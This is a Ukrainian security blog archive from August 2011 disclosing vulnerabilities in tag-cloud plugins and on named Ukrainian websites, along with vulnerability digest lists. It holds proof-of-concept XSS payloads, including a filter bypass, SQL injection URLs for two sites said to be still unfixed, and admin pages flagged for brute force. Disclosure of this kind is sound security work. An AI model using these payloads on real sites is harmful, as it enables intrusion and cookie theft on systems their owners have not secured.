Архів для категорії 'Уразливості'

Уразливість в плагінах для RapidWeaver, Habari, DasBlo, eZ Publish та EE

23:53 31.08.2011

Раніше я вже писав про уразливість в Tumulus для Typepad та багатьох інших портах WP-Cumulus для різних движків. Така ж уразливість є і в версіях даного плагіна для RapidWeaver, Habari, DasBlog, eZ та Expression Engine, що використовують tagcloud.swf розроблений автором WP-Cumulus.

Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах. Автори цих плагінів, як і тих плагінів, про які я писав раніше, так і не спромоглися виправити дану XSS уразливість з листопада 2009 року, коли я оприлюднив уразливості в WP-Cumulus для WordPress, повідомив про них авторові й він маже повністю їх виправив. Тому доводиться нагадувати кожному з цих розробників окремо.

В травні, 11.05.2011, я знайшов Cross-Site Scripting уразливість в Tag cloud для RapidWeaver, HB-cumulus для Habari, Cumulus для DasBlog, EZcumulus для eZ Publish та Simple Tags для EE. Про що найближчим часом повідомлю їх розробникам.

XSS:

http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії WP-Cumulus для RapidWeaver, HB-Cumulus для Habari версія 1.4 і попередні вразливі до XSS (і всі версії вразливі до HTML Injection), Cumulus для DasBlog (старі версії до XSS і всі версії до HTML Injection), EZcumulus 1.0 для eZ Publish та Simple Tags для Expression Engine версія 1.6.3 і нові версії (де була додана підтримка даного swf-файла).

Також вразливий плагін eZ Flash Tag Cloud - це інший плагін для eZ Publish (який підтримується розробниками, на відміну від EZcumulus). Вразлива версія eZ Flash Tag Cloud 1.0. В версії 1.1 розробники виправили XSS, після мого повідомлення, але вона все ще вразлива до HTML Injection.

Добірка уразливостей

16:07 31.08.2011

В даній добірці уразливості в веб додатках:

  • Symantec LiveUpdate Administrator CSRF vulnerability (деталі)
  • XSS vulnerability in UMI.CMS (деталі)
  • Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability (деталі)
  • XSS vulnerability in ViArt Shop (деталі)
  • SCADA Trojans: Attacking the Grid + Advantech vulnerabilities (деталі)
  • XSS vulnerability in ViArt Shop (деталі)
  • rogea Movicon TCPUploadServer Remote Exploit (деталі)
  • Stored XSS vulnerability in WebAsyst Shop-Script (деталі)
  • IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS (деталі)
  • XSS vulnerability in WebAsyst Shop-Script (деталі)

Уразливості на www.telegroup.ua

23:53 30.08.2011

10.11.2010

У липні, 25.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на сайті http://www.telegroup.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.08.2011

XSS:

POST запит на сторінці http://www.telegroup.ua/ru/cms/search
“><script>alert(document.cookie)</script>
В полі пошуку.

Даний варіант атаки вже виправлено. Але неякісно, тому можна використати цей варіант:
“><body onload=alert(document.cookie)>

Brute Force:

http://www.telegroup.ua/admin/

BF уразливість вже виправлена, але XSS досі не виправлена.

Уразливості на mirdomov.ua

23:50 29.08.2011

08.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на проекті http://mirdomov.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.08.2011

XSS:

Brute Force:

http://mirdomov.ua/admin/

Дані уразливості досі не виправлені.

Численні уразливості в PHP

20:37 29.08.2011

Виявлені численні уразливості безпеки в PHP.

Уразливі версії: PHP 5.3.

Звертання по нульовому вказівнику, пошкодження пам’яті в ZipArchive.

Добірка уразливостей

17:29 29.08.2011

В даній добірці уразливості в веб додатках:

  • EMC Avamar sensitive information disclosure vulnerability (деталі)
  • SQL Injection in ReOS (деталі)
  • RSA, The Security Division of EMC, announces a fix for potential security vulnerability in RSA Access Manager Server (деталі)
  • XSS in Podcast Generator (деталі)
  • Path disclosure in Podcast Generator (деталі)
  • SAP Crystal Reports 2008 - Multiple XSS (деталі)
  • Symantec IM Manager Administrative Interface IMAdminSchedTask.asp Eval Code Injection Remote Code Execution Vulnerability (деталі)
  • vBulletin 4.1.2 0-day Denial Of Service Exploit (деталі)
  • IBM Lotus Domino Server Controller Authentication Bypass Remote Code Execution Vulnerability (деталі)
  • XSRF (CSRF) in UMI.CMS (деталі)

Уразливості на www.br-ua.com

23:59 27.08.2011

04.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на проекті http://www.br-ua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

27.08.2011

XSS:

Brute Force:

http://www.br-ua.com/admin/

Дані уразливості досі не виправлені.

Уразливість на kvadrat.ua

23:51 26.08.2011

29.10.2010

У липні, 06.07.2010, я знайшов SQL Injection уразливість на сайті http://kvadrat.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.08.2011

SQL Injection:

http://kvadrat.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Добірка уразливостей

17:35 26.08.2011

В даній добірці уразливості в веб додатках:

  • HP MFP Digital Sending Software Running on Windows, Authentication Bypass (деталі)
  • TinyWebGallery: XSS + Directory Traversal (деталі)
  • SQL Injection in ReOS (деталі)
  • Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability (деталі)
  • SQL Injection in ReOS (деталі)
  • HP Client Automation Enterprise (HPCA) Running on Windows, Remote Execution of Arbitrary Code (деталі)
  • Local File Inclusion in Podcast Generator (деталі)
  • SQL Injection in ReOS (деталі)
  • nostromo nhttpd directory traversal leading to arbitrary command execution (деталі)
  • Local File Inclusion in ReOS (деталі)

Уразливість на stella.kiev.ua

23:53 25.08.2011

27.10.2010

У липні, 06.07.2010, я знайшов SQL Injection уразливість на сайті http://stella.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

25.08.2011

SQL Injection:

http://stella.kiev.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.